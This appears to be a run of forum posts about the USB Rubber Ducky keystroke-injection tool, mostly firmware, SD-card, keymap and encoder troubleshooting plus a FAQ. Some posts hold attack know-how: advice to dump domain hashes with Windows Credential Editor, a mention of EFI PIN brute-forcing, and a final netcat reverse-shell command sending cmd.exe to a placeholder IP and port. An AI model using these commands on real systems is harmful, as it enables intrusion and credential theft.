no42

Only triggers when LEDs are on, so either double tap the key. Or have the relevant key press as the first line in the specific payload injectX.bin. I can put protection in to prevent payloads interfering - cant remember if I did this. In this firmware? The more feedback we receive the better. Thanks Snake

http://orvtech.com/en/howto/atacar-efi-pin-macbook-pro/ The Guy writes a brute-force script for his Teensy to brute-force his EFI PIN. Unfortunately, he didn't realise his mistake in his original Teensy code (Hey, it can happen to the any of us). He failed at Brute-Forcing the PIN! His mistake has since been pointed out, and corrected by the community. Bottom line is maybe "He should have bought a Ducky", the easy to use Ducky Script language and Darren's Android Brute-Force Payload, (with minor mods) probably could have unlocked the EFI within 24hrs.

Probably down, until Darren updates it with new content. He's having fun round Europe at the moment, guess we just have to wait. For now, you have some sample payloads on github, and other stuff on ducky-decode: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/ http://code.google.com/p/ducky-decode/ Anything else, just ask on the forum... I've implemented tag posting in topic titles, so its easy to use google for searching for posts on a given subject. Google Dorks: site:forums.hak5.org [firmware] site:forums.hak5.org [encoder] site:forums.hak5.org [payload] site:forums.hak5.org [question]

What VPN have you connected to? Openvpn is used to create an encrypted tunnel between your computer and a network eg. home network/ office network / VPS service. If you want to access websites with an anonymous IP, I suggest looking at TOR (and privoxy).

Apart from using Linux and dfu-programmer to download the firmware images; and providing the MD5's there is no way to tell! I cant imagine the hardware changing as that could lead to incompatibility with the community firmwares, its got to be newer firmware.

Depends how you extracted the key - it might have non-printable characters, it could be encrypted? Just whack it in wpa_supplicant - it should still work. If your on Windows it should still work if you use it as the passphrase. If its just hex, use a hex to ascii convertor (plenty online), see if it can be translated directly to ascii, but you may have non-printable characters

Im inclined to say "no", http://www.pcreview.co.uk/forums/move-registry-hibernate-once-resume-many-t529864.html But you can move the ntdis.dit (where all domain creds are held) http://support.microsoft.com/kb/257420 http://www.frickelsoft.net/blog/?p=165

Apparently, this would only be marginal, not sure its worth the effort.

Yes (Version 2.1), but you have to flash it yourself. You weren't dreaming the post is here: http://forums.hak5.org/index.php?/topic/28670-question-ducky-as-a-plain-old-usb-drive/ Maximising the most out of the SPI bandwidth. It would be nice to achieve 4MB/s but that means money to the SD association ($2000USD+ for membership per year), any increase in cost would raise the cost of the Ducky, we want to keep the cost as cheap as possible.

Im not involved in the hardware design/production. But I believe their still the same chip. Are you running different firmware(s)? Also, it could be down to the quality of the sdcard? Im still on the red one, with a previously owned sdcard (sdcard that came with it died).

run WCE (Windows Credential Editor) - to dump domain hashes, and any plain text hashes on a given dc server.

The Sebek server was linux only, the clients were available for win32 and linux. However, I dont think the project is maintained, so may require an older kernel. Alternatives, you may want to read up on: http://honeypots.sourceforge.net/monitoring_vmware_honeypots.html http://www.spitzner.net/honeypot.html http://www.tracking-hackers.com/solutions/

Are you sure its the Ducky, and not the sdcard? Are there any lights? Does the Ducky register in Device Manager (WIndows) (or dmesg on Linux)?

Maybe we should collate and advertise all the interesting things the Duck can do? To gain access to systems in Social Engineering engagements. To prove the gaps in Data Loss Prevention Policies. To help automate the process of complex tasks. (eg build wireless profiles on corporate wireless networks that use peap and 802.1x authentication - Ive have seen this cause confusion in the office!). To demo the possibility of behaving like a yubi-key, for improved passwords.

Looks like a good idea. But isn't c:\windows\system32 protected, you need admin permissions to write there, and the user my not have these rights?

This is what Atmel gave me: and I know your proficient at reading and modifying the code, and you appear to have more development time than me at the moment. I challenge you to do better than my improvements! You can either give a man a fish for a day, or give him a rod and teach him to fish for life...

GLOBAL_WR_PROTECT - Tried that, it didn't work. So I dug a little deeper and found http://forums.hak5.org/index.php?/topic/28512-question-secure-sd-duck/?p=216531 Last option is probably to change the way alll the sd_mmc commands like sd_mmc_spi_write_sector_from_ram work. I havn't got a lot of time at the moment, and I appear to be I'm a 1-man-band! until others catch up? If you can work it out, share the source, and we can all test it.

It means all interfaces so if you IP is 10.1.1.1 on eth0, and 192.168.1.1 on wlan0 your service appears on 10.1.1.1 (eth0),192.168.1.1(wlan0) & 127.0.0.1(localhost)

You could leave the "Naked Duck" (this time the exposed board not the firmware) plugged in, and just press the GPIO (ducky's tiny button) to replay the sequence.

Do you have the output of these commands from above make && make plugins sudo make suidinstall sudo make plugins-install The only thing I can think of, is that the plugin hasn't been created due to some error?

Multiple different types of cards have been tested by users. I personally have used 64MB upto 1GB with no problems. My cards have not been partitioned, so they use the full allocated space, and have been formatted in FAT (windows) or VFAT (unix).

Having previous experience with backtrack, I think you'll find other debian based distro's easier debian ubuntu mint Your choice? Kali will probably be available at Defcon in August?

Will the Ducky work straight away? The Ducky is currently pre-loaded with the stock original (duck) HID injecting firmware. It will work straight out of the box. Note: Plain old HID injection (keyboard emulation) - no fancy features! Ducky Resources/Websites? The main website: http://usbrubberducky.com Also try: https://github.com/hak5darren/USB-Rubber-Ducky/wiki http://code.googlde.com/p/ducky-decode/ or even this forum... I inserted my Ducky into a Windows Computer and nothing happens? The Ducky’s LEDs are programmed to provide feedback to the user: A flashing GREEN LED usually means the computer and Ducky are talking to each other. A flashing RED LED means the Ducky can’t read the SDcard. If you did not notice any LEDs: Sometimes, the host OS is a bit slow and misses the Ducky’s commands while it is enumerating the device. Try pushing the Ducky's GPIO Button it calls a REPLAY function? The Ducky’s button acts as a simple reply button in its default setting. However, this button is also used to put the Ducky into DFU-MODE. Check the Ducky's Button is not stuck. Try pushing the button on the Ducky… any lights? actions? My Ducky is flashing RED, what now? Take out the SDcard (it can be stiff first of all, so don’t worry), some people have used tweezers or have been fairly gentle with a flat-tipped screwdriver. Try reinserting the SDcard, or alternatively insert the card into an SDcard adapter/reader, and see if the host OS (Windows/Unix/OSX) can natively read the card. If the host OS can read the card, re-insert it back into the Ducky and try again. If the host OS can’t read the card, you may try re-formatting the card (FAT), or simply try another SDcard that you may have (commonly found in mobile phones, cameras, etc). When I plug in the Ducky, it does something weird, and executes everything on my desktop? The secret behind multi-OS support, was the timings in the USB stack. The Ducky is real fast, as such the Ducky will start quacking commands as soon as it is inserted into the computer. Try adding a wait command “DELAY 3000” as the first line in your Ducky Script. This gives the host OS enough time to enumerate the Ducky as a HID keyboard. Note: You may need to tweak the DELAY command depending on your system(s). I'm from X country, the Ducky fires off seemingly random keys, what is going on? The stock duckencoder.jar only supports keymaps for USA. However, the community Duckencoder (available from http://code.google.com/p/ducky-decode) can support more language/keymaps. Please read more below! I’m from X country, my language is not supported, the Ducky is pointless. Please don’t think like that. The solution is simple. Get onto this forum and ask for support. We can guide you through the process of creating a new key-map which will benefit everyone. Without the community, this project cannot succeed. :)We need you! And your feedback is welcomed! :) What Languages are Currently Supported? US (United States) UK (United Kingdom) DE (German) DK (Danish) FR (French) BE (Belgian) NO (Norwegian) PT (Portuguese) SV (Swedish) IT (Italian) ES (in development get in touch) RU (in development get in touch) OK. How do I run the DuckEncoder.jar using a specific keyboard map? Depending on the filename its either encoder.jar/duckencoder.jar. Make sure you have java installed (if not visit http://www.oracle.com/technetwork/java/javase/downloads/index.html) Command: java -jar duckencoder.jar -l <location of language.properties> -i input.txt Example Windows: java -jar duckencoder.jar -l resources\uk.properties -i input.txt Example Linux/OSX: java -jar duckencoder.jar -l resources/uk.properties -i input.txt Note: the different direction of the \ / . Also if -l is not specified it defaults to Amercian (USA). What Filesystems are Supported Atmel AVR's only support the FAT filesystem. Therefore, the Ducky is limited to reading FAT formatted sdcards. Depending on your OS this may be either FAT,FAT16,FAT32,VFAT. (For sdcards over 2GB it has to be FAT32/VFAT) I think my Ducky is Dead? Don’t Panic! Check the FAQ's above, you may want to try flashing the Ducky, to rule out software errors. If this all fails, its likely a hardware fault/ Ducky has become damaged in the post (it can happen). There is a decent Hak5 Returns/Exchange Policy, just contact shop@hak5.org. The Micro SDcard is Stuck, How do I get it out? Initially the micro sdcard may appear to be stuck or jammed. Do not worry! Many users have used tweezers or a small flat-head screwdriver to prize the card out of the Ducky's sd-slot (using the lip at the end of the card). Now the sdcard-slot is very stiff at first, repeatedly inserting and removing the sd-card several times will slowly loosen the slot; making it easier in the future to extract and replace the micro sdcard. Encoder / Java Woes If you get the following error with the Encoder: Exception in thread "main" java.lang.UnsupportedClassVersionError: Encoder : Unsupported major.minor version 51.0 It means that your version of Java is outdated (likely version 1.6.x), the current Encoder is pre-compiled with version 1.7.25. You can either update Java to the latest version, or download the source, and use the java jdk to compile your own version compatible with 1.6.x. Full instructions are on the ducky-decode website (above).

Ducky only supports the FAT filesystem! Format as FAT, FAT16, FAT32, VFAT (depending on OS).

netcat reverse shell (provided your using TwinDuck firmware): $ %myd%\nc -e cmd.exe [ip] [port]